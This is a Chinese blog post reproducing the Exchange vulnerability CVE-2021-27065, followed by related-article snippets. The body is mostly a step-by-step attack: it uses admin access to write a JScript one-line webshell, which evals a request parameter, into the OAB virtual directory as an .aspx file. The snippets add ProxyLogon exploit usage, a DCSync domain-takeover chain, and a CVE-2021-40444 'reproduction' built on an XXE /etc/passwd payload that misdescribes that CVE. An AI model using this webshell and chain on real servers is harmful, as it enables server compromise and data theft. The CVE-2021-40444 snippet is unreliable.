CVE-2021–27065漏洞分析及复现

网安星星

于 2024-02-27 12:00:00 发布

阅读量233

点赞数 1

文章标签：网络安全学习

本文链接：https://blog.csdn.net/2301_80520893/article/details/136303819

版权

接着昨天的说

CVE-2021–27065

CVE-2021–27065是⼀个任意⽂件写⼊漏洞，它需要登陆的管理员账号权限才能触发。而CVE-2021–26855正好可以为我们提供了管理员账号权限。

登录管理员账号后,进入:服务器——>虚拟目录——>OAB

编辑OAB配置,在外部链接中写⼊shell并保存。

http://aaa/<script language="JScript" runat="server">function Page_Load(){eval(Request["SD"],"unsafe");}</script>

保存后选择重置虚拟目录写下shell位置为:\\127.0.0.1\c$\inetpub\wwwroot\aspnet_client\sd.aspx

查看shell文件,写入了一句话木马。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

网安星星

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
CVE-2021–27065漏洞分析及复现

接着昨天的说。
复制链接

扫一扫

Exchange ProxyLogon远程代码执行漏洞(CVE-2021-27065)和勒索病毒BlackKingdom家族

不忘初心，护天下安全！

04-29

2240

Microsoft Exchange Server远程代码执行(RCE)/ProxyLogon(CVE-2021-27065)和勒索病毒BlackKingdom

CVE-2021-26858/CVE-2021-27065 Exchange 任意文件写入结合Write Dcsync Acl打域控

谢公子的博客

03-14

5140

查询域内具备Dcsync权限的用户，可以看到已经有xie\hack了 hack用户拥有dcsync权限后，即可导出域内任意用户哈希，导出administrator用户的哈希，远程连接域控。

参与评论您还未登录，请先登录后发表或查看评论

cve-2021-27065:快速一线Powershell脚本来检测webshell，可能的zip和日志

03-12

我将基于搜索被盗数据继续添加任何新代码或修改现有代码如果您受到攻击，这些脚本绝不会为您解决！除了您现在知道系统发生了什么程度之外，这些都对您没有好处。话虽这么说，我将继续在此处添加脚本，以用于研究可能会从系统中窃取了哪些数据。有用的链接 CVE-2021-27065 Quick One Line Powershell脚本可检测webshell，可能的zip和日志。运行后的每个脚本都将输出到位于C根目录的临时驱动器中的CSV：快速代码说明： CompedFiles.ps1 这将从指定的路径开始遍历每个文件夹并在其中查找文件。然后，它命中的每个文件都将开始检查文件中的模式“ \ w *：// \ w / <\ w * \ s。 <。 >”。每次匹配都会选择文件的路径和找到的文件中的行选择之后，它将把它写到位于C根目录下的temp文件夹中的CSV文件中：日

CVE-2021-26855与CVE-2021-27065（Exchange）联合利用打域控

good good study

04-01

9173

CVE-2021-26855（也叫ProxyLogon）与CVE-2021-27065是微软在2021年3月2日发布的高危漏洞公告，危害等级高危。这两个漏洞组合利用，可直接获取目标邮件服务器主机权限。CVE-2021-26855 SSRF 漏洞； CVE-2021-27065 任意文件写入漏洞。利用原理：通过ssrf漏洞读取到邮箱用户的SID——>通过有效SID结合任意文件写入漏洞上传以.aspx结尾的文件，在其中插入一句话木马——>造成交互式shell。 ...

proxylogon-exploit:CVE-2021-26855和CVE-2021-27065的概念验证漏洞。 Exchange中未经身份验证的RCE

03-25

代理登录 CVE-2021-26855和CVE-2021-27065的概念验证漏洞，它允许在Microsoft Exchange上执行未经身份验证的远程代码，如以下资源所述：用法开发需要了解前端Exchange服务器URL（例如https://exchange.example.org ）和系统上用户的电子邮件地址。管理员SID和后端可能从服务器泄漏。 $ python exploit.py -h usage: exploit.py [-h] [--frontend FRONTEND] [--email EMAIL] [--sid SID] [--webshell WEBSHELL] [--path PATH] [--backend BACKEND] [--proxy PROXY] proxylogon proof-of-concept optional argume

CVE-2021–26855与CVE-2021–27065漏洞分析及复现

hongduilanjun的博客

05-09

3965

文章首发先知社区：https://xz.aliyun.com/t/10098 前言微软在上半年三月披露了关于Exchange邮件服务器CVE-2021–26855(SSRF)与CVE-2021–27065(任意文件写入)的漏洞,这两个漏洞配合可以造成未授权的webshell写入,是非常严重的高危漏洞。漏洞刚出来那会儿并未注意,正好前两天4哥在群里发了个关于该漏洞的复现环境,重新想起这个事,正好暑假也没干啥正事,借此机会复现分析一下。 CVE-2021–26855 CVE-2021–26855是⼀个SSRF

检测通过“ proxylogon”组漏洞（CVE-2021-26855，CVE-2021-26857，CVE-2021-26858，CVE-2021-27065）利用的Microsoft Exchange服务器上掉落的Web Shell-.NET开发

05-27

预认证SSRF，CVSS：3.0 9.1 / 8.4 CVE-2021-26857，不安全的反序列化导致特权升级到SYSTEM级别，CVSS：3.0 7.8 / 7.2 CVE-2021-26858，认证后文件写入， CVSS：3.0 7.8 / 7.2 CVE-2021-27065，认证后文件写入，CVSS...

CVE-2021-21972：CVE-2021-21972漏洞利用

03-04

CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866，VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...

CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975

04-06

CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考：博客例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP

exchange_webshell_detection:检测通过“ proxylogon”组漏洞（CVE-2021-26855，CVE-2021-26857，CVE-2021-26858，CVE-2021-27065）利用的Microsoft Exchange服务器上掉落的Web外壳

03-06

在0天危害后检测Microsoft Exchange服务器上掉落的Web Shell 此脚本查找掉落在Microsoft Exchange服务器上的Webshell，而这些Webshell容易受到以下CVE的攻击：，预认证SSRF，CVSS：3.0 9.1 / 8.4 ，不安全的反序列化导致特权升级到SYSTEM级别，CVSS：3.0 7.8 / 7.2 ，写后验证文件，CVSS：3.0 7.8 / 7.2 ，验证后写入文件，CVSS：3.0 7.8 / 7.2 2021年1月的最初活动归功于HAFNIUM，但此后其他威胁行为者掌握了这些漏洞并开始使用它们。在Microsoft公开发布补丁程序之前（自2月27日左右），公开暴露的Exchange服务器开始被任意利用。因此，在Microsoft发布最新的Exchange更新后立即安装这些更新并不能完全缓解先前

(环境搭建+复现)CVE-2021-26855 2021年3月 Exchange Server RCE 复现

daxi0ng的博客

03-16

6654

0x00 简介 Exchange Server是微软公司的是一套电子邮件服务组件，是个消息与协作系统，主要提供包括从电子邮件、会议安排、团体日程管理、任务管理、文档管理、实时会议和工作流等协作应用。 0x01 漏洞概述 CVE-2021-26855 该漏洞是Exchange中的服务端请求伪造漏洞（SSRF），利用此漏洞的攻击者能够发送任意HTTP请求并绕过Exchange Server身份验证，远程未授权的攻击者可以利用该漏洞以进行内网探测，并可以用于窃取用户邮箱的全部内容。危害：该漏洞是Exch

Centos7系统安全漏洞怎么修复？（超详细修复方案）

最新发布

jennycisp的博客

05-25

4922

一. 内网升级服务及命令版本方法内网环境，无法使用yum命令 —— 则离线升级安装rpm包Centos的rpm包地址（大多数包可在这找到）：CentOS Mirror若是包版本不全，可使用此博客的4.1方法下载安装升级包：Docker系列之二：离线安装docker_sara的博客-CSDN博客_docker离线安装升级软件包命令：rpm会自动卸载相应软件包的旧版本// * 指代rpm包的名字// 此命令是离线升级安装软件包，若有网，则可以直接使用yum命令。

Centos修复CVE漏洞，快速检测CVE漏洞是否修复的方法

木简熙的博客

04-07

5133

最近在做公司云平台安全漏洞修复项目，主要负责kernel的漏洞修复，kernel使用3.10.0-1062.el7.x86_64，使用绿盟安全扫描仪扫描平台漏洞。 1.漏洞扫描结果 2.kernel漏洞列表打开一个漏洞扫描结果，里面会给出相应修复方法的链接，打开链接https://lists.centos.org/pipermail/centos-announce/20...

关于网站目录下自动生成“aspnet_client”文件夹的问题

weixin_34304013的博客

12-25

573

在今天，配置完IIS后，看到项目多了一个aspnet_client的文件夹，这是干什么的？在网上搜一下吧！看到很多关于它的链接，但内容基本都是一样的，在园子里也搜到一篇，也不知道是谁是原创，杯具！自己找到了一篇，分享一下吧！标题：《网站目录下自动生成“aspnet_client”文件夹是什么？》链接：http://www.ml.tc/aspnet_client/ 原文如下： ...

ASP.NET虚拟主机安全漏洞解决方案

12-14

794

说明：本文中所需环境为2003Server+iis6.0+ms sql2000　　曾经很早就在网上看到一篇关于＜asp.net虚拟主机的重大隐患＞的文章，当时并不在意，做过asp虚拟主机的朋友可能都知道，即对每一个用户都设置一个独立的服务器用户和单个目录的操作权限，能够基本上解决asp的fso问题。　　在网上无意中发现了一个叫做webadmin的asp.net-webshell，对自己的服务器进行

CVE-2021-31209 分析学习

二狗的博客

03-30

122

对于从来没有接触过网络安全的同学，我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线，大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供：当然除了有配套的视频，同时也为大家整理了各种文档和书籍资料&工具，并且已经帮大家分好类了。

cve-2021-40444漏洞kali复现

04-06

由于cve-2021-40444漏洞的严重性，建议仅在合法授权的测试环境中进行复现和测试，不要在生产环境中尝试。以下是在Kali Linux中复现cve-2021-40444漏洞的步骤： 1. 安装 OpenOffice 打开终端并输入以下命令： ``` sudo apt update sudo apt install openoffice ``` 2. 创建恶意文档使用文本编辑器创建一个名为“恶意文档.odt”的OpenOffice文档，并将以下内容复制并粘贴到文档中： ``` <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> <root> <Content>Some content</Content> <Image xlink:href="expect://id`xxe`"/> </root> ``` 这个文档包含一个外部实体xxe，它引用了/etc/passwd文件。攻击者可以通过xxe漏洞读取系统上的任何文件。 3. 打开恶意文档在终端中，输入以下命令以打开恶意文档： ``` soffice恶意文档.odt ``` OpenOffice将打开文档并加载其中的外部实体。攻击者可以在OpenOffice中使用“编辑”功能读取/操作系统文件。可以在终端中使用以下命令测试是否可以读取/etc/passwd文件： ``` cat /tmp/dump ``` 如果成功，将输出/etc/passwd文件的内容。 4. 修复漏洞为了防止cve-2021-40444漏洞的利用，建议升级OpenOffice或LibreOffice到最新版本，或者禁用OpenOffice的自动加载外部实体功能。

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交